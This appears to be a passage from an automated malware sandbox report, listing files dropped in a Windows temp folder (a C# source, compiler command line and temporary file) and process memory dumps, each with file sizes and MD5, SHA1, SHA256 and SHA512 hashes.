aa1d2b1ea3c9de3ccadb319d4e3e3276a2f27dd1a5244fe72de2b6f94083dddc762480482c5c2e53f803cd9e3973ddefc68966f974e124307b5043e654443b98

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ryd345hd\CSC2FE68A61A3F645148FDE65863EC8FDA3.TMP

Filesize
652B

MD5
99b8c031606de0e9a5b601285b14af8b

SHA1
34704934adf7385260328a6c1b78eded1849c875

SHA256
088a8177905d2e701fc223781031afab716dd2e73893317d12d855d60abb240b

SHA512
4d4441bb6436e61e5a949c846bdd1b4b7f66b69981423249e12ff77a9be02a316fce1517e12ff99a085a5f4b8c5895d043264fd8ec0f7620191fa75f3eb413ae

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ryd345hd\ryd345hd.0.cs

Filesize
1004B

MD5
c76055a0388b713a1eabe16130684dc3

SHA1
ee11e84cf41d8a43340f7102e17660072906c402

SHA256
8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

SHA512
22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ryd345hd\ryd345hd.cmdline

Filesize
607B

MD5
f248f090a17bff0ea2f3db4d1ef3b5b4

SHA1
88f86f051ac621dce92e6b14d9d617ec8ce3150e

SHA256
32543554569023198a93989f28d4731e0d0991be952e40e08e37b8d064bbfc6d

SHA512
e1a151a1660cec8f0c5fca0526d19be6592d39033f5902f4b702a50c744e07eac9865ae8905765b047566691028a084c7a874408ccb654b0f0c56a68852fbcb1

Download Submit
memory/2128-0-0x00007FFD0E0B3000-0x00007FFD0E0B5000-memory.dmp

Filesize
8KB

Download
memory/2128-15-0x00007FFD0E0B0000-0x00007FFD0EB72000-memory.dmp

Filesize
10.8MB

Download
memory/2128-11-0x00007FFD0E0B0000-0x00007FFD0EB72000-memory.dmp

Filesize
10.8MB

Download
memory/2128-10-0x00007FFD0E0B0000-0x00007FFD0EB72000-memory.dmp

Filesize
10.8MB

Download
memory/2128-25-0x00000213E3420000-0x00000213E3428000-memory.dmp

Filesize
32KB

Download
memory/2128-30-0x00007FFD0E0B0000-0x00007FFD0EB72000-memory.dmp

Filesize
10.8MB

Download
memory/2128-6-0x00000213E1170000-0x00000213E1192000-memory.dmp

Filesize
136KB

Download
memory/4200-49-0x0000000000D80000-0x0000000000D92000-memory.dmp

Filesize
72KB

Download